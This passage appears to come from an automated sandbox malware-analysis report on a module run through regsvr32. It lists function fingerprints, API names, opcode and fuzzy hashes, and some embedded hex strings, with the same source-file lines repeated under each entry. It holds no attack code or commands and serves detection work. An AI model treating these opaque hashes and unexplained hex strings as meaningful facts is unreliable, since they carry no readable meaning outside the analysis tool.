                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                • String ID: MOC$RCC
                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                • Opcode ID: 4e01fa3ee231a06c343f71608dc3e69df44d15f0f733f4aed609b78be9fcc6f4
                                                                                                                • Instruction ID: b84e9902fabec4b0103d9f3a795a2226016b4719b937893eae137175ca37ac45
                                                                                                                • Opcode Fuzzy Hash: 4e01fa3ee231a06c343f71608dc3e69df44d15f0f733f4aed609b78be9fcc6f4
                                                                                                                • Instruction Fuzzy Hash: 899195B3A08B818AE710CBA5E4407AD7BA0F744788F58412EEE4E67755DF78F59AC700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • 890367f6564d5d34cd008765d87fa7b5b98cdb1f7904696d90a06637df9007823e0f5d98fa86e8ed102097c62e61f673caf8af690f731e1ae7d21135de9672f14f, xrefs: 00007FF983D0859D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide
                                                                                                                • String ID: 890367f6564d5d34cd008765d87fa7b5b98cdb1f7904696d90a06637df9007823e0f5d98fa86e8ed102097c62e61f673caf8af690f731e1ae7d21135de9672f14f
                                                                                                                • API String ID: 469901203-4124513118
                                                                                                                • Opcode ID: 3602cfd0d42010217e373dacb309e58bce7e78d8b1765175df8e9e158eb95b46
                                                                                                                • Instruction ID: 9c8486367b2f6a695caffc4f1dcd33ac69dfd4566782d074f961af5316e5ff81
                                                                                                                • Opcode Fuzzy Hash: 3602cfd0d42010217e373dacb309e58bce7e78d8b1765175df8e9e158eb95b46
                                                                                                                • Instruction Fuzzy Hash: E751F9A2B14681A8EB00DFB5D0507EC2761FB45B98F888135DA1EA7BDADE78F149C340
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • 1517069f017ffb28667302e58ad77fca2505339eafe02b33652665b40ee9a65c7c596ac6f3bd756f397a489923c48b71547244ebda945f47172016c67491df2106, xrefs: 00007FF983D087DD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide
                                                                                                                • String ID: 1517069f017ffb28667302e58ad77fca2505339eafe02b33652665b40ee9a65c7c596ac6f3bd756f397a489923c48b71547244ebda945f47172016c67491df2106
                                                                                                                • API String ID: 469901203-501322296
                                                                                                                • Opcode ID: 569b2215dfc5715a82d41289f70e8fdd74dfa9d9afdc4ca22f6335679392d67c
                                                                                                                • Instruction ID: 78ade171f4ed180716ce92f82520f3f5432cb8b9e857cc45207ba37d6b09d77b
                                                                                                                • Opcode Fuzzy Hash: 569b2215dfc5715a82d41289f70e8fdd74dfa9d9afdc4ca22f6335679392d67c
                                                                                                                • Instruction Fuzzy Hash: 9951FBD2B1568198EB00DFB5D0507EC2761FB44B98F888135DA5EA7BDADE78F149C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID: $*
                                                                                                                • API String ID: 3215553584-3982473090
                                                                                                                • Opcode ID: c5ba4a7307209a58e5633475c8d9a203ba91463100d76d49df4e6dc230a4d0e5
                                                                                                                • Instruction ID: 738b9c882d75971694be9ab4397b5d72d34b45aa40961c7bfd578a340ecc5f13
                                                                                                                • Opcode Fuzzy Hash: c5ba4a7307209a58e5633475c8d9a203ba91463100d76d49df4e6dc230a4d0e5
                                                                                                                • Instruction Fuzzy Hash: 2D6187B290C25286E768CF6A805467C7BA5FB05B04F9C113DD64FA3299DFA9F849D700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.98%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • d4738a02b928335e7de46b0526c11f9183997d5a878197adfe3f304d5da8, xrefs: 00007FF983D0131D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$InfoNativeSystem
                                                                                                                • String ID: d4738a02b928335e7de46b0526c11f9183997d5a878197adfe3f304d5da8
                                                                                                                • API String ID: 836507568-2598894011
                                                                                                                • Opcode ID: cb92bb46cebca72f8651a21447b93ae4e746fe33eb5e49174483c909dc6c2128
                                                                                                                • Instruction ID: f34521d508e3b8faa9adf15c60e082a9250a9f565d018dc319cde271fec662a0
                                                                                                                • Opcode Fuzzy Hash: cb92bb46cebca72f8651a21447b93ae4e746fe33eb5e49174483c909dc6c2128
                                                                                                                • Instruction Fuzzy Hash: 7441A5A2B1878181EA10DB69E09475D6351FB857E0F945239EB9D93BE9DFBCF088C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo$_get_daylight
                                                                                                                • String ID:
                                                                                                                • API String ID: 72036449-0
                                                                                                                • Opcode ID: 6dd91ec7018cd3d03dd38f34976e1d3839a928ce2cc03b79f6f8a5dee0fa9b4c
                                                                                                                • Instruction ID: 7848fff868e7244c4dd88e6e99e6157614a4e5a019d649a4dd4335b838a2f5e8
                                                                                                                • Opcode Fuzzy Hash: 6dd91ec7018cd3d03dd38f34976e1d3839a928ce2cc03b79f6f8a5dee0fa9b4c
                                                                                                                • Instruction Fuzzy Hash: 8951B1B2E0860296F768C9E89440B797540BB40714F9D443DDA0FF72E6DAECB94AD641
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 1.44%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FilePointer$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 142388799-0
                                                                                                                • Opcode ID: 51c5d0b0d340aa6278112220f9dd4920b96edda5edc0a1a51ae440398d5ccfb2
                                                                                                                • Instruction ID: e84d8a4085f905f8aa69d89249519c73ca0063f2096425dbab20d0d7d3c3b84a
                                                                                                                • Opcode Fuzzy Hash: 51c5d0b0d340aa6278112220f9dd4920b96edda5edc0a1a51ae440398d5ccfb2
                                                                                                                • Instruction Fuzzy Hash: 3C21BBA3A08A4281DB10DB65A801B69B351BB84BA0FDC0335D56FE7AD4DEBCF459C740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.24%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: __except_validate_context_record
                                                                                                                • String ID: csm$csm
                                                                                                                • API String ID: 1467352782-3733052814
                                                                                                                • Opcode ID: 36ffa24156ef67850ce43c3d3424e815371ab658b65586de8c56cd910bd32f05
                                                                                                                • Instruction ID: da66dde18b83057f5386aa42f67c610220cfe3737137225ab1b64b209afd96d6
                                                                                                                • Opcode Fuzzy Hash: 36ffa24156ef67850ce43c3d3424e815371ab658b65586de8c56cd910bd32f05
                                                                                                                • Instruction Fuzzy Hash: 0B71D5B250868186D761CF66D040B797BA0FB40F85F888139EA4EA7B85CF7CF996D700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID: e+000$gfff
                                                                                                                • API String ID: 3215553584-3030954782
                                                                                                                • Opcode ID: 10a3ef1d052316caaaaee41695669b900b3bcf0be50960d7c2ffc76df5b4546d
                                                                                                                • Instruction ID: 205b44d89cd97ceee395f481e109ac40f9fd7b2d708ab18705182d10acfc7fda
                                                                                                                • Opcode Fuzzy Hash: 10a3ef1d052316caaaaee41695669b900b3bcf0be50960d7c2ffc76df5b4546d
                                                                                                                • Instruction Fuzzy Hash: 835147A2B186C186E724CF75994176D6B91FB80B90F8C9239C79D97BD5CEACF448C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 1.11%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _handle_errorf
                                                                                                                • String ID: "$powf
                                                                                                                • API String ID: 2315412904-603753351
                                                                                                                • Opcode ID: 652a7e7705ab8cec3a43a6861bd90ae7b267cf4f23eb1fdb4e23173311a5305a
                                                                                                                • Instruction ID: 105d9609fc8878d5a6c176a0b24cea667ddbc48c42e4ada3d0dedf250708b68a
                                                                                                                • Opcode Fuzzy Hash: 652a7e7705ab8cec3a43a6861bd90ae7b267cf4f23eb1fdb4e23173311a5305a
                                                                                                                • Instruction Fuzzy Hash: A84195B3D28680CBE370CF62E480BA9B7A0F799348F141329F74A56998CBBDD554DB00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 3.53%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                • String ID: >>
                                                                                                                • API String ID: 3668304517-2870946365
                                                                                                                • Opcode ID: cde5cdb6593ad0a329061dbbeaa412a580a08610cf0e8eeff6053d63afc9cbdc
                                                                                                                • Instruction ID: ee01a0b2bf94d6f600e05fd24200f5b2f2056d0130219c130d0071202a37a087
                                                                                                                • Opcode Fuzzy Hash: cde5cdb6593ad0a329061dbbeaa412a580a08610cf0e8eeff6053d63afc9cbdc
                                                                                                                • Instruction Fuzzy Hash: 74216FA2A0468191EA04DBA5D09876D33A2FB44FC8F988039D74E97659DFBCF4A4C344
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _handle_error
                                                                                                                • String ID: "$pow
                                                                                                                • API String ID: 1757819995-713443511
                                                                                                                • Opcode ID: 27aa9e4456571abb7611841da671f5bdd742cb657259e18622e4dde5688f2da9
                                                                                                                • Instruction ID: f2caa1dbae5c0fe55843c19cb52215b3441a5fbe045e0728a9da34a9e7a70aae
                                                                                                                • Opcode Fuzzy Hash: 27aa9e4456571abb7611841da671f5bdd742cb657259e18622e4dde5688f2da9
                                                                                                                • Instruction Fuzzy Hash: 1E3184B2D1CAC586D770CF50E040B6BB6A0FBDA384F141329F68A5A954DBFDE185DB00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 1.47%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CompareStringtry_get_function
                                                                                                                • String ID: CompareStringEx
                                                                                                                • API String ID: 3328479835-2590796910
                                                                                                                • Opcode ID: 8b8cec4aaa48750e5595f163a3ee38e18226a02e0d79436543ba82fe73597251
                                                                                                                • Instruction ID: 0c31ce2bc8bf824b5ad2afc42d52669391f5fc5893507759926f52c7fbf2ae4a
                                                                                                                • Opcode Fuzzy Hash: 8b8cec4aaa48750e5595f163a3ee38e18226a02e0d79436543ba82fe73597251
                                                                                                                • Instruction Fuzzy Hash: 89113076608B8186D760CB55B44079AB7A0FBC9B90F58413AEECE93B19DF7CE548CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 5.06%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Stringtry_get_function
                                                                                                                • String ID: LCMapStringEx
                                                                                                                • API String ID: 2588686239-3893581201
                                                                                                                • Opcode ID: 4ede907a2e89eb3f1f65562d7df3e5d129746184517bbdd29761990bad3bc2f0
                                                                                                                • Instruction ID: 38b518ded94524d56f6c33315c135fcc47a6494e1336907928d78d0f10bf6b4e
                                                                                                                • Opcode Fuzzy Hash: 4ede907a2e89eb3f1f65562d7df3e5d129746184517bbdd29761990bad3bc2f0
                                                                                                                • Instruction Fuzzy Hash: A0113E76608B8186D760CB45B4407AAB7A1FB88B90F58413AEE8E93F59CF7CE444CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 3.32%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                • String ID: InitializeCriticalSectionEx
                                                                                                                • API String ID: 539475747-3084827643
                                                                                                                • Opcode ID: 7fbae409679859a71c58585c3126cb322e235c233146637da39d6228bd56cb13
                                                                                                                • Instruction ID: a5f2f8a252689b159321e4e4e1271f25089d7c8297708fcdad3f6874d157473d
                                                                                                                • Opcode Fuzzy Hash: 7fbae409679859a71c58585c3126cb322e235c233146637da39d6228bd56cb13
                                                                                                                • Instruction Fuzzy Hash: 29F03AA2E18A8182EB14DB95B540AA562A1BF48B80F8C4039EA5F63B55CEACF45DC740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 2.28%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Valuetry_get_function
                                                                                                                • String ID: FlsSetValue
                                                                                                                • API String ID: 738293619-3750699315
                                                                                                                • Opcode ID: 0a693a1abd842adf0613c275b2fa7a1b6d1c31aab5dff857b20875aa701a0f86
                                                                                                                • Instruction ID: f3a70e5dd97ba38dc53d92df6a945d51c946fe5c322a7f3b2b2608ecfe5abd30
                                                                                                                • Opcode Fuzzy Hash: 0a693a1abd842adf0613c275b2fa7a1b6d1c31aab5dff857b20875aa701a0f86
                                                                                                                • Instruction Fuzzy Hash: 19E030E2A0864291EB05CB90A800AB52262BF48780FCC403AD51F96A95CEADF49DC610
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 1.69%